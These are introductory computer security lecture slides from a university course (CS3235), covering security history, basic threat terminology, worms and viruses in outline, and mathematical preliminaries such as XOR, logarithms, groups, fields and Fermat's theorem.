Introduction to Computer SecurityCS3235
Hugh Anderson
CS3235 - Hugh Anderson’s notes.
Contact information
Room S15 #06-12Telephone 6874-6903E-mail [email protected]
...and Spinellis...
CS3235 - Hugh Anderson’s notes. Page number: 1
People
Dr Robert Deng, Institute for Infocomm Research
http://www.i2r.a-star.edu.sg/icsd/staff/Robert/
CS3235 - Hugh Anderson’s notes. Page number: 2
Official SOC description
With the widespread use of computers and Internet as well as electronic com-merce, computer security becomes more and more important. The objectiveof this module is to give students basic knowledge of computer security. Thismodule covers the following topics: threats to computer systems, network se-curity fundamentals, security in a layered protocol architecture, authenticationin computer systems, access control, intrusion detection, security architectureand frameworks, lower layers security protocols, upper layer security proto-cols, electronic mail and EDI security, directory systems security, Unix systemssecurity, security evaluation criteria.
CS3235 - Hugh Anderson’s notes. Page number: 3
Assessment
Assessment Weighting Grade
Assignments 35%
Tutorials 5%
Mid-term Closed book 10%
Final Exam Open Book 50%
Total marks 100%
CS3235 - Hugh Anderson’s notes. Page number: 4
Resources
Computer Security: Art and Science, Matt Bishop
The notes are expanded versions of the overheads
Directed readings - all available on the Internet.
IVLE at http://ivle.nus.edu.sg/
Web site at http://www.comp.nus.edu.sg/˜cs3235
CS3235 - Hugh Anderson’s notes. Page number: 5
Comparison
Different focus
More introductory and practical material
Less material duplicated
CS3235 - Hugh Anderson’s notes. Page number: 6
Topics - general
History and background,
Preliminaries
Encoding and decoding
Protocols used for security.
CS3235 - Hugh Anderson’s notes. Page number: 7
Topics - detail
• Mathematical, physical, legal (2 lectures)
• Security models (1 lecture)
• Secrecy (1 lecture)
• Insecurity (2 lectures)
• Safety/control hardware/software (2 lectures)
• Assurance (1 lecture)
• Protocols (1 lecture)
• + Case studies
CS3235 - Hugh Anderson’s notes. Page number: 8
Tutorials
Start in 3rd week
More details next week
CS3235 - Hugh Anderson’s notes. Page number: 9
My expectation...
Attend classes and tutorials
Ask if you don’t know
Read notes, book, and the readings...
Get interested in the subject
CS3235 - Hugh Anderson’s notes. Page number: 10
Chapter 1
Lecture 1 - Introduction
CS3235 - Hugh Anderson’s notes. Page number: 11
Jump-about-introduction
...sorry sorry...
CS3235 - Hugh Anderson’s notes. Page number: 12
The History of Herodotus
For Histiæus, when he was anxious to give Aristagoras orders torevolt, could find but one safe way, as the roads were guarded,of making his wishes known; which was by taking the trustiestof his slaves, shaving all the hair from off his head, and thenpricking letters upon the skin, and waiting till the hair grew again.Thus accordingly he did; and as soon as ever the hair was grown,he despatched the man to Miletus, giving him no other messagethan this- "When thou art come to Miletus, bid Aristagoras shavethy head, and look thereon." Now the marks on the head, as Ihave already mentioned, were a command to revolt...
CS3235 - Hugh Anderson’s notes. Page number: 13
The History of Herodotus
Histiæus ensured confidentiality
Used again by Germany in the 1914-1918 war
This is now called steganography
CS3235 - Hugh Anderson’s notes. Page number: 14
More history
Cæsar encoded messages - cryptography
Agreed protocols to ensure correct conduct of a war
Examples taken from the world of warfare
CS3235 - Hugh Anderson’s notes. Page number: 15
Aspects to “computer security”
Security problems in society reoccur in computers
Confidentiality = locks/encoding.
Integrity = handshakes/signatures
Computer versions much faster.
In this course, security includes wider aspects.
CS3235 - Hugh Anderson’s notes. Page number: 16
Terms: Services
Three aspects of security services:
• confidentiality : concealing information - resources;
• integrity : trustworthiness of data - resources;
• availability : preventing denial-of-service.
CS3235 - Hugh Anderson’s notes. Page number: 17
Terms: Threats
Alice Bob
Ted
Snooping
CS3235 - Hugh Anderson’s notes. Page number: 18
Terms: Threats
Alice Bob
Ted
Man in the middle
CS3235 - Hugh Anderson’s notes. Page number: 19
Terms: Threats
Alice Bob
Ted
Denial of service
CS3235 - Hugh Anderson’s notes. Page number: 20
Terms: Threats
Alice Bob
Ted
Spoofing
CS3235 - Hugh Anderson’s notes. Page number: 21
Terms: Threats
• disclosure : unauthorized access (snooping);
• deception : accept false data (man-in-the-middle);
• disruption : prevent correct operation (denial-of-service);
• usurpation : unauthorized control (spoofing).
CS3235 - Hugh Anderson’s notes. Page number: 22
Terms: Policy and mechanism
We differentiate between a security policy and a securitymechanism:
• policy : what is allowed/disallowed;
• mechanism : ways of enforcing a policy
CS3235 - Hugh Anderson’s notes. Page number: 23
NUS IT policy
For example, at NUS, we have an IT policy which includesa range of clauses regarding security concerns, such as:
4.2 Undermining System Integrity
Users must not undermine the security of the IT Re-sources, for example, by cracking passwords or tomodify or attempt to modify the files of other Usersor software components of the IT Resources.
CS3235 - Hugh Anderson’s notes. Page number: 24
NUS mechanisms
6.3 Use Of Security Scanning Systems
Users consent to the University’s use of scanning pro-grams for security purposes at system level for com-puters and systems that are connected to the Univer-sity’s network. This is to ensure that any computersor systems attached to the network will not become alaunching pad for security attack and jeopardise the ITResources. System level scanning includes scanningfor security vulnerabilities and virus detection on emailattachments. Users’ files and data are excluded fromthe scanning.
CS3235 - Hugh Anderson’s notes. Page number: 25
Topic: Preliminaries
Review some mathematical concepts. XOR, modulo,primes
The textbook, and my notes should be enough.
Physical laws and procedures. Information and Entropy
CS3235 - Hugh Anderson’s notes. Page number: 26
Topic: Security models
These models provide formal ways of looking at computersecurity in an abstract manner.
1. Define a model, and
2. prove it secure
3. Ensure system complies with model
CS3235 - Hugh Anderson’s notes. Page number: 27
Topic: Security models
• The Bell-LaPadula model (no read-up, no write-down)provides a military viewpoint to assure confidentiality ser-vices.
• The Biba and Clark-Wilson models attempt to model thetrustworthiness of data and programs, providing assur-ance for integrity services.
... Read ahead ...
CS3235 - Hugh Anderson’s notes. Page number: 28
Topic: Security models
Determine properties of the model, and
Verify that implementations are valid.
Basis of trusted operating systems
Modelling for availability is tricky
CS3235 - Hugh Anderson’s notes. Page number: 29
Topic: Secrecy
Commerce relies on secure transfer of information, and
Often just want things to be secret
Distance between you and an attacker is shrinking
Criminals have an access point into your living room
CS3235 - Hugh Anderson’s notes. Page number: 30
2000 years ago...
Replace each Roman letter in a message, with another Ro-man letter, obtained by rotating the alphabet some numberof characters:
I C L A V D I V S
A B C D E F G H I K L M N O P Q R S T V X Y Z
V X Y Z A B C D E F G H I K L M N O P Q R S T
E Y G V Q Z E Q O
We can specify a Cæsar cipher by just noting the number ofcharacters that the alphabet is rotated.
CS3235 - Hugh Anderson’s notes. Page number: 31
60 years ago...
CS3235 - Hugh Anderson’s notes. Page number: 32
60 years ago
CS3235 - Hugh Anderson’s notes. Page number: 33
Enigma machines
Commercial device
Used by the German military
Belief that could not be decoded.
CS3235 - Hugh Anderson’s notes. Page number: 34
Enigma machines
CS3235 - Hugh Anderson’s notes. Page number: 35
Enigma machines
CS3235 - Hugh Anderson’s notes. Page number: 36
Hacking Enigma
Americans captured a German submarine?
Alan Turing did it all?
Hard workers at Bletchley Park?
My dad?
CS3235 - Hugh Anderson’s notes. Page number: 37
Hacking Enigma
1928: Poles intercepted a machine
1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski.
Decoded some messages
German army using an extra level of encoding
French spies uncovered the extra encoding
CS3235 - Hugh Anderson’s notes. Page number: 38
Hacking Enigma
1933-1939: the Polish Ciphers Office was able to decodemessages, although slowly.
July 1939: Poland gave Enigma copies to English
Bletchley Park
May 1941: English captured the U-110 submarine, com-plete with a genuine Enigma machine, and code books.
CS3235 - Hugh Anderson’s notes. Page number: 39
Hacking Enigma
1941-45: English could decode most German militarytransmissions.
1941-45: developed a hardware system
Precursor to modern-day computers
CS3235 - Hugh Anderson’s notes. Page number: 40
Today...sssshhhh
Secure encrypted communications between
two untrusted hosts over an insecure network.
Other connections can also be forwarded
Users must prove their identity to the remote machine
CS3235 - Hugh Anderson’s notes. Page number: 41
Secure-shell
Based on public-key cryptography:
Encryption and decryption use separate keys not possible to derive one from other RSA is one such system.
Encodings believed to be difficult to decode, and
protocols of message exchange that are believed to besecure.
CS3235 - Hugh Anderson’s notes. Page number: 42
Topic: Insecurity
Systems dangerously easy to subvert
Adversary gains control over your system
You sign a contract, and other party doesn’t.
Investigate hacking and reducing risk
CS3235 - Hugh Anderson’s notes. Page number: 43
Topic: Insecurity
A locked air-conditioned room with file server:
• The lock can be picked, or the door kicked in.
• The console of the server computer may be passwordprotected, but
– it may be rebooted with a different disk.
CS3235 - Hugh Anderson’s notes. Page number: 44
Topic: Insecurity
• The reboot process may be (BIOS) password protected,but
– the case of the computer may be opened and the diskremoved.
• And so on...
CS3235 - Hugh Anderson’s notes. Page number: 45
Topic: Insecurity
Tempest - computer screen monitoring
Paper
http://jya.com/emr.pdf
Overcoming
http://www.cs.rice.edu/˜dwallach/courses/comp527 s2000/ih98-tempest.pdf
Monitor screens at a distance of 1km for $15.
CS3235 - Hugh Anderson’s notes. Page number: 46
Topic: Insecurity
Kick in doors without even using your feet
CS3235 - Hugh Anderson’s notes. Page number: 47
Topic: Insecurity
Non-repudiation for e-commerce:
• the buyer cannot order an item and then deny the ordertook place;
• the seller cannot accept money or an order and then laterdeny that this took place.
CS3235 - Hugh Anderson’s notes. Page number: 48
Topic: Insecurity
Intrusive hacking is common on the Internet.
Farms of subservient machines:
At first, it looked as if some students at the Flint HillSchool, a prep academy in Oakton, Va., had found alucrative alternative to an after-school job...
CS3235 - Hugh Anderson’s notes. Page number: 49
Topic: Insecurity
Virusses: boot-sector hide their code in the boot sectorof a disk.
the stoned virus for DOS, written by a student fromNew Zealand!
A virus contains code that replicates, attaching itself toa program, boot sector or document. Some viruses dodamage as well.
CS3235 - Hugh Anderson’s notes. Page number: 50
Topic: Insecurity
Worm is a program that makes copies of itself, transferringitself around. The Morris worm in 1988:
On the evening of 2 November 1988, someone in-fected the Internet with a worm program. That pro-gram exploited flaws in utility programs in systemsbased on BSD-derived versions of UNIX. The flaws al-lowed the program to break into those machines andcopy itself, thus infecting those systems.
CS3235 - Hugh Anderson’s notes. Page number: 51
The Morris Worm
This program eventually spread to thousands of ma-chines, and disrupted normal activities and Internetconnectivity for many days.
ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z
The author of the worm, Robert Morris, was convicted andfined $10,050 in 1990, and is currently a professor in theParallel and Distributed Operating Systems group at MIT,lecturing in distributed systems areas.
CS3235 - Hugh Anderson’s notes. Page number: 52
Topic: Protocols
Some aspects of security are determined by the way inwhich we do things (the protocol), rather than what is ac-tually done.
CS3235 - Hugh Anderson’s notes. Page number: 53
Topic: Protocols
CS3235 - Hugh Anderson’s notes. Page number: 54
Summary of topics
In this section, we introduced the following topics:
• An introduction to computer security
• Some definitions
CS3235 - Hugh Anderson’s notes. Page number: 55
Further study
• Textbook Chapter 1
• Monitoring computer screenshttp://jya.com/emr.pdf
• Overcoming Tempest monitoringhttp://www.cs.rice.edu/˜dwallach/courses/comp527 s2000/ih98-tempest.pdf
• The Morris wormftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z
• Military mathematical modelling of securityhttp://80-ieeexplore.ieee.org.libproxy1.nus.edu.sg/xpl/tocresult.jsp?isNumber=13172
CS3235 - Hugh Anderson’s notes. Page number: 56
Done!
CS3235 - Hugh Anderson’s notes. Page number: 57
Chapter 2
Lecture 2 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 58
Note: CORS
You should be getting your tutorial sessions sorted out usingCORS!
http://www.cors.nus.edu.sg/
CS3235 - Hugh Anderson’s notes. Page number: 59
Overheads and notes
You can find all sorts of stuff looking in
http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/
CS3235 - Hugh Anderson’s notes. Page number: 60
Question box
If you have any questions, feel free to place them in thequestion box...
Or stick your hand up...
Or...
CS3235 - Hugh Anderson’s notes. Page number: 61
Last session
Introduction, setting context
Definitions
Cæsar cipher, Enigma, Secure shell
Insecurity
CS3235 - Hugh Anderson’s notes. Page number: 62
This session
• Finish context
• Math preliminaries
– XOR– Logarithms– Fields and groups
CS3235 - Hugh Anderson’s notes. Page number: 63
This session
• Finish context
• Math preliminaries
– XOR– Logarithms– Fields and groups
CS3235 - Hugh Anderson’s notes. Page number: 64
Diagram for BAG
CS3235 - Hugh Anderson’s notes. Page number: 65
Safety/control software
A naive approach to security might involve attempting to en-sure that all programs that run on a computer are safe, andthat all users of computer systems are trustworthy .
Checking even one program is a non-trivial task.
The computer operating system normally provides somelevel of software and hardware security for computer sys-tems, combined with some level of user authorization.
CS3235 - Hugh Anderson’s notes. Page number: 66
Safety/control software
User authorization means passwords!
Systems have grown in complexity over the years.
An article shows the changes in the UNIX mechanism
CS3235 - Hugh Anderson’s notes. Page number: 67
Hardware security
Hardware security in operating systems has been stud-ied in CS2106 (Operating Systems) and other courses.The Kernel/Supervisor bit, processor ring0, memory protec-tion/mapping hardware and so on are all examples of hard-ware security systems intended to co-operate with the OSto enhance system security.
Software security in operating systems takes many forms.The forms range from ad-hoc changes to operating systemsto fix security loopholes as they are found, through to oper-ating systems built from the ground up to be secure.
CS3235 - Hugh Anderson’s notes. Page number: 68
Example: network security
TCP wrappers:
Attacks through poorly controlled TCP or UDP ports. Wrapper provides single point of control Default installation disables all access Re-enable on a case-by-case basis.
CS3235 - Hugh Anderson’s notes. Page number: 69
OS security
NSA have a security-enhanced Linux system:
This version of Linux has a strong, flexible mandatoryaccess control architecture incorporated into the ma-jor subsystems of the kernel. The system providesa mechanism to enforce the separation of informationbased on confidentiality and integrity requirements.
You can read about SELinux at
http://www.nsa.gov/selinux/index.html
CS3235 - Hugh Anderson’s notes. Page number: 70
OS security
Java virtual machine has built-in security model
Microsoft point out that the Linux security model isweak...
Every member of the Windows NT family since Win-dows NT 3.5 has been evaluated at either a C2 levelunder the U.S. Government’s evaluation process or ata C2-equivalent level under the British Government’sITSEC process. In contrast, no Linux products arelisted on the U.S. Government’s evaluated product list.
CS3235 - Hugh Anderson’s notes. Page number: 71
Topic: Assurance
How can we convince ourselves (or our employer) that thecomputer system is to be trusted?
Building assurance is best done by adopting formal meth-ods to confirm, specify and verify the behaviour of systems.
CS3235 - Hugh Anderson’s notes. Page number: 72
ITSEC and CC
UK, Germany, France, Netherlands produced Informa-tion Technology Security Evaluation Criteria (ITSEC).
IT Security Evaluation Manual (ITSEM) specifiesmethodology for evaluation.
Common Criteria for Information Technology SecurityEvaluation is ITSEC, CTCPEC (Canadian Criteria) andUS Federal Criteria
Accepted by the ISO (ISO15408).
CS3235 - Hugh Anderson’s notes. Page number: 73
ITSEC
In an article, elements of the first certification of a smart-card system under the European ITSEC level 6 certificationare outlined.
This process involved verification of the specification with in-dependent systems, and a formal process for the implemen-tation, deriving it from the specification using the refinementprocess.
CS3235 - Hugh Anderson’s notes. Page number: 74
Math preliminaries
This chapter and the following chapter are copied ver-batim from the ”The Laws of Cryptography with JavaCode”, with permission from Prof Neal Wagner. Thebook is well worth reading and contains a lot of infor-mation that is relevant to this course. You can find thebook at
http://www.cs.utsa.edu/˜wagner/lawsbookcolor/laws.pdf
CS3235 - Hugh Anderson’s notes. Page number: 75
Exclusive-Or
Law XOR-1:The cryptographer’s favorite function is Exclusive-Or .
Exclusive-Or comes up constantly in cryptography.
Same as addition mod 2
CS3235 - Hugh Anderson’s notes. Page number: 76
Exclusive-Or
Also as xor or a plus sign in a circle, ⊕.
The expression a⊕ b means either a or b but not both.
Ordinary inclusive-or in mathematics means either oneor the other or both.
The exclusive-or function in C / C++ / Java for bit stringsas a hat character: ^ .
CS3235 - Hugh Anderson’s notes. Page number: 77
Exclusive-Or for 1-bit
Exclusive-Ora b a⊕ b
0 0 00 1 11 0 11 1 0
CS3235 - Hugh Anderson’s notes. Page number: 78
Exclusive-Or
Message A B C
m 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .
Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .
K(m) = m⊕ k 0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .
K(m) R ’ z
CS3235 - Hugh Anderson’s notes. Page number: 79
Exclusive-Or
K(m) R ’ z
0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .
Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .
m = K(m)⊕ k 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .
Message A B C
If the bit-stream is random, and not known to an eavesdrop-per, then this is the most secure system. It is known as aone-time-pad.
CS3235 - Hugh Anderson’s notes. Page number: 80
Properties of XOR
a⊕ a = 0a⊕ 0 = aa⊕ 1 =∼ a, where ∼ is bit complement.a⊕ b = b⊕ a (commutativity)a⊕ (b⊕ c) = (a⊕ b)⊕ c (associativity)a⊕ a⊕ a = aif a⊕ b = c, then c⊕ b = a and c⊕ a = b.
CS3235 - Hugh Anderson’s notes. Page number: 81
Reminder
Exchange the values in two variables a and b
temp = a;a = b;b = temp;
CS3235 - Hugh Anderson’s notes. Page number: 82
Exchange using XOR
a = a xor b;b = a xor b;a = a xor b;
a′ = a⊕ b
b′ = (a⊕ b)⊕ b = a
a′′ = (a⊕ b)⊕ a = b
CS3235 - Hugh Anderson’s notes. Page number: 83
Logarithms
Law LOG-1:The cryptographer’s favorite logarithm is log base 2 .
y = logb x is the same as by = x
b(logb x) = x
Logarithm is inverse of exponential.
CS3235 - Hugh Anderson’s notes. Page number: 84
Logarithms
Use logs base 2 in cryptography.
y = log2 x is the same as 2y = x
210 = 1024 is the same as log2 1024 = 10.
2y > 0 for all y, and
log2 x is not defined for x ≤ 0.
CS3235 - Hugh Anderson’s notes. Page number: 85
Properties of logs
log2(ab) = log2 a + log2 b, for all a, b > 0log2(a/b) = log2 a− log2 b, for all a, b > 0log2(1/a) = log2(a−1) = − log2 a, for all a > 0log2(ar) = r log2 a, for all a > 0, rlog2(a + b) = (Oops! No simple formula for this.)
CS3235 - Hugh Anderson’s notes. Page number: 86
Examples
Logarithms base 2
x = 2y = 2log2 x y = log2 x
1, 073, 741, 824 30
1, 048, 576 20
1, 024 10
8 3
4 2
2 1
1 0
CS3235 - Hugh Anderson’s notes. Page number: 87
Examples
Logarithms base 2
x = 2y = 2log2 x y = log2 x
1 0
1/2 −1
1/4 −2
1/8 −3
1/1, 024 −10
0 −∞< 0 undefined
CS3235 - Hugh Anderson’s notes. Page number: 88
Natural logs
A log base 2 is just a fixed constant times a natural log:
log2 x = loge x/ loge 2, (mathematics)
= Math.log(x)/Math.log(2.0); (Java).
The magic constant is:
loge 2 = 0.69314 71805 59945 30941 72321, or 1/ loge 2 = 1.44269 50408 88963 40735 99246.
CS3235 - Hugh Anderson’s notes. Page number: 89
Proof of formula
2y = x, or y = log2 x (then takeloge of each side)
loge(2y) = loge x (then use properties of logarithms)
y loge 2 = loge x (then solve for y)
y = loge x/ loge 2 (then substitutelog2 x for y)
log2 x = loge x/ loge 2.
CS3235 - Hugh Anderson’s notes. Page number: 90
Bits to represent
Law LOG-2:The log base 2 of an integer x tells how many bits it takes
to represent x in binary.
Thus log2 10000 = 13.28771238, so it takes 14 bits to repre-sent 10000 in binary. (In fact, 1000010 = 100111000100002.)Exact powers of 2 are a special case: log2 1024 = 10, but ittakes 11 bits to represent 1024 in binary, as 100000000002.
Similarly, log10(x) gives the number of decimal digitsneeded to represent x.
CS3235 - Hugh Anderson’s notes. Page number: 91
Groups
A group is
a set of group elements with a binary operation f
If one denotes the group operation by #, then the abovesays that for any group elements a and b, a#b is definedand is also a group element.
CS3235 - Hugh Anderson’s notes. Page number: 92
Groups
Groups
are associative, meaning that a#(b#c) = (a#b)#c have an identity element e satisfying a#e = e#a = a
for any group element a. have an inverse a′ any element a satisfying a#a′ =
a′#a = e.
CS3235 - Hugh Anderson’s notes. Page number: 93
Groups
If a#b = b#a for all group elements a and b, the group iscommutative.
Otherwise it is non-commutative. Notice that even in anon-commutative group, a#b = b#a might sometimesbe true — for example if a or b is the identity.
A group with only finitely many elements is called finite;otherwise it is infinite.
CS3235 - Hugh Anderson’s notes. Page number: 94
Examples
• The integers (all whole numbers, including 0 and nega-tive numbers) form a group using addition. The identityis 0 and the inverse of a is −a.
– This is an infinite commutative group.
• The positive rationals (all positive fractions, including allpositive integers) form a group if ordinary multiplicationis the operation. The identity is 1 and the inverse of r is1/r = r−1.
– This is another infinite commutative group.
CS3235 - Hugh Anderson’s notes. Page number: 95
Examples
• The integers mod n form a group for any integer n > 0.This group is often denoted Zn. Here the elements are0, 1, 2, . . ., n − 1 and the operation is addition followedby remainder on division by n. The identity is 0 and theinverse of a is n−a (except for 0 which is its own inverse).
– This is a finite commutative group.
CS3235 - Hugh Anderson’s notes. Page number: 96
Non-commutative Group
Consider 2-by-2 non-singular matrices of real numbers(or rationals), where the operation is matrix multiplication:(
a bc d
). Here a, b, c, and d are real numbers (or ratio-
nals) and ad− bc must be non-zero. Inverse is
1ad− bc
(d −b
−c a
)
and the identity is(
1 00 1
). This is an infinite non-
commutative group.
CS3235 - Hugh Anderson’s notes. Page number: 97
Groups
Law GROUP-1:The cryptographer’s favorite group is the integers mod n ,
Zn.
In the special case of n = 10, the operation of addition inZ10 can be defined by (x + y) mod 10, that is, divide by 10and take the remainder.
CS3235 - Hugh Anderson’s notes. Page number: 98
Integers modulo 10
+ 0 1 2 3 4 5 6 7 8 90 0 1 2 3 4 5 6 7 8 91 1 2 3 4 5 6 7 8 9 02 2 3 4 5 6 7 8 9 0 13 3 4 5 6 7 8 9 0 1 24 4 5 6 7 8 9 0 1 2 35 5 6 7 8 9 0 1 2 3 46 6 7 8 9 0 1 2 3 4 57 7 8 9 0 1 2 3 4 5 68 8 9 0 1 2 3 4 5 6 79 9 0 1 2 3 4 5 6 7 8
CS3235 - Hugh Anderson’s notes. Page number: 99
Fields
A field has two operations
+, with elements of the field forming a commutativegroup. Identity is 0 and inverse of a is −a.
∗, with elements of the field except 0 forming anothercommutative group, identity denoted by 1 and inverseof a denoted by a−1.
CS3235 - Hugh Anderson’s notes. Page number: 100
Fields
There is also the distributive identity, linking + and ∗ :
a ∗ (b + c) = (a ∗ b) + (a ∗ c)
Exclude divisors of zero, that is, non-zero elementswhose product is zero.
Equivalent to the following cancellation property: if c isnot zero and a ∗ c = b ∗ c, then a = b.
CS3235 - Hugh Anderson’s notes. Page number: 101
Examples
The rational numbers (fractions) Q, or the real numbersR, or the complex numbers C, using ordinary additionand multiplication (extended in the last case to the com-plex numbers).
These are all infinite fields.
CS3235 - Hugh Anderson’s notes. Page number: 102
Example: integers mod p
The integers mod p, denoted Zp, where p is a prime num-ber (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, . . . ).
A group using +. Elements without 0 form a group under ∗. The identity is clearly 1, but the inverse of a non-zero element a is not obvious.
CS3235 - Hugh Anderson’s notes. Page number: 103
Integers mod p inverse
In Java, inverse must be x satisfying (x ∗ a)%p == 1.
Find x using the extended Euclidean algorithm:
p is prime and a is non-zero, the greatest commondivisor of p and a is 1.
The extended Euclidean algorithm gives x and y sat-isfying x ∗ a + y ∗ p = 1, or x ∗ a = 1− y ∗ p,
and x is the inverse of a.
CS3235 - Hugh Anderson’s notes. Page number: 104
Field
Law FIELD-1:The cryptographer’s favorite field is the integers mod p ,
denoted Zp , where p is a prime number.
The above field is the only one with p elements. In otherwords, the field is unique up to renaming its elements,meaning that one can always use a different set of sym-bols to represent the elements of the field, but it will still beessentially the same.
CS3235 - Hugh Anderson’s notes. Page number: 105
Another Field
Law FIELD-2:The cryptographer’s other favorite field is GF(2n).
A finite field with pn elements for any integer n > 1, de-noted GF (pn).
Useful in cryptography with p = 2, that is, with 2n ele-ments for n > 1.
The case 28 = 256 is used, for example, in the new U.S.Advanced Encryption Standard (AES).
CS3235 - Hugh Anderson’s notes. Page number: 106
Fermat’s Theorem
Law FERMAT-1:The cryptographer’s favorite theorem is Fermat’s Theorem.
In cryptography, one often wants to raise a number to apower, modulo another number.
For the integers mod p where p is a prime (denoted Zp),there is a result know as Fermat’s Theorem, discoveredby the 17th century French mathematician Pierre de Fer-mat, 1601-1665.
CS3235 - Hugh Anderson’s notes. Page number: 107
Fermat’s theorem
Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then
ap−1 mod p = 1
CS3235 - Hugh Anderson’s notes. Page number: 108
Fermat’s theorem
p a a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12
13 2 2 4 8 3 6 12 11 9 5 10 7 1
13 3 3 9 1 3 9 1 3 9 1 3 9 1
13 4 4 3 12 9 10 1 4 3 12 9 10 1
13 5 5 12 8 1 5 12 8 1 5 12 8 1
13 6 6 10 8 9 2 12 7 3 5 4 11 1
13 7 7 10 5 9 11 12 6 3 8 4 2 1
13 8 8 12 5 1 8 12 5 1 8 12 5 1
13 9 9 3 1 9 3 1 9 3 1 9 3 1
13 10 10 9 12 3 4 1 10 9 12 3 4 1
13 11 11 4 5 3 7 12 2 9 8 10 6 1
13 12 12 1 12 1 12 1 12 1 12 1 12 1
CS3235 - Hugh Anderson’s notes. Page number: 109
Fermat’s theorem
For p = 13 the value is always 1 by the time the powergets to 12
Sometimes the value gets to 1 earlier
Lengths of runs are always numbers that divide evenlyinto 12
A value of a for which the whole row is needed is calleda generator . 2, 6, 7, and 11 are generators.
CS3235 - Hugh Anderson’s notes. Page number: 110
Summary of topics
In this section, we introduced “Cryptographers favorites”
CS3235 - Hugh Anderson’s notes. Page number: 111
Further study
• The Laws of Cryptography with Java Codehttp://www.cs.utsa.edu/˜wagner/lawsbookcolor/laws.pdf
CS3235 - Hugh Anderson’s notes. Page number: 112
Chapter 3
Lecture 3 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 113
Overheads and notes
You can find all sorts of stuff looking in
http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/
CS3235 - Hugh Anderson’s notes. Page number: 114
Question box
If you have any questions, feel free to place them in thequestion box...
Or stick your hand up...
Or...
CS3235 - Hugh Anderson’s notes. Page number: 115
Last session
• Finish context
• Math preliminaries
– XOR– Logarithms– Fields and groups
CS3235 - Hugh Anderson’s notes. Page number: 116
Recap - exclusive-or
Law XOR-1:The cryptographer’s favorite function is Exclusive-Or .
Message A B C
m 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .
Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .
K(m) = m⊕ k 0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .
K(m) R ’ z
CS3235 - Hugh Anderson’s notes. Page number: 117
Exclusive-Or
K(m) R ’ z
0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .
Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .
m = K(m)⊕ k 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .
Message A B C
If the bit-stream for the key k is random, and not known toan eavesdropper, then this is the most secure system. It isknown as a one-time-pad.
CS3235 - Hugh Anderson’s notes. Page number: 118
Another diagram
XPKi[P]P
X(Plaintext)(Plaintext)
KiKi
(Compare with previous representations).
CS3235 - Hugh Anderson’s notes. Page number: 119
Logarithms
Law LOG-1:The cryptographer’s favorite logarithm is log base 2 .
y = logb x is the same as by = x
b(logb x) = x
Logarithm is inverse of exponential.
CS3235 - Hugh Anderson’s notes. Page number: 120
Groups
A group is
a set of group elements with a binary operation
Law GROUP-1:The cryptographer’s favorite group is the integers mod n ,
Zn.
CS3235 - Hugh Anderson’s notes. Page number: 121
Fields
A field has two operations
+, with elements forming a commutative group. ∗, with elements\0 forming another group,
Law FIELD-1:The cryptographer’s favorite field is the integers mod p ,
denoted Zp , where p is a prime number.
Law FIELD-2:The cryptographer’s other favorite field is GF(2n).
CS3235 - Hugh Anderson’s notes. Page number: 122
This session
• Math preliminaries
– Fermat’s little theorem– Euler
CS3235 - Hugh Anderson’s notes. Page number: 123
This session
• Math preliminaries
– Fermat’s little theorem– Euler
CS3235 - Hugh Anderson’s notes. Page number: 124
Fermat’s theorem
Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then
ap−1 mod p = 1
CS3235 - Hugh Anderson’s notes. Page number: 125
Fermat’s theorem, p = 13
p a a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12
13 2 2 4 8 3 6 12 11 9 5 10 7 1
13 3 3 9 1 3 9 1 3 9 1 3 9 1
13 4 4 3 12 9 10 1 4 3 12 9 10 1
13 5 5 12 8 1 5 12 8 1 5 12 8 1
13 6 6 10 8 9 2 12 7 3 5 4 11 1
13 7 7 10 5 9 11 12 6 3 8 4 2 1
13 8 8 12 5 1 8 12 5 1 8 12 5 1
13 9 9 3 1 9 3 1 9 3 1 9 3 1
13 10 10 9 12 3 4 1 10 9 12 3 4 1
13 11 11 4 5 3 7 12 2 9 8 10 6 1
13 12 12 1 12 1 12 1 12 1 12 1 12 1
CS3235 - Hugh Anderson’s notes. Page number: 126
Fermat’s theorem, p = 13
Lengths of runs are always numbers that divide evenlyinto 12
A value of a for which the whole row is needed is calleda generator . 2, 6, 7, and 11 are generators.
CS3235 - Hugh Anderson’s notes. Page number: 127
An interesting observation..
Because a to a power mod p always starts repeating afterthe power reaches p− 1, you can do this:
ax mod p = ax mod (p−1) mod p.
Thus modulo p in the expression requires modulo p − 1 inthe exponent. For p = 13 as above, then
a29 mod 13 = a29 mod 12 mod 13 = a5 mod 13.
CS3235 - Hugh Anderson’s notes. Page number: 128
Another example
result = 71215 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 129
Another example
result=
62247027506732273704655645590797926890623986483292191309020787710924
86991072740587065198907810173838994978267934813009677708927826601313
55777365361484044783800851222817392261341421370762400507026834564501
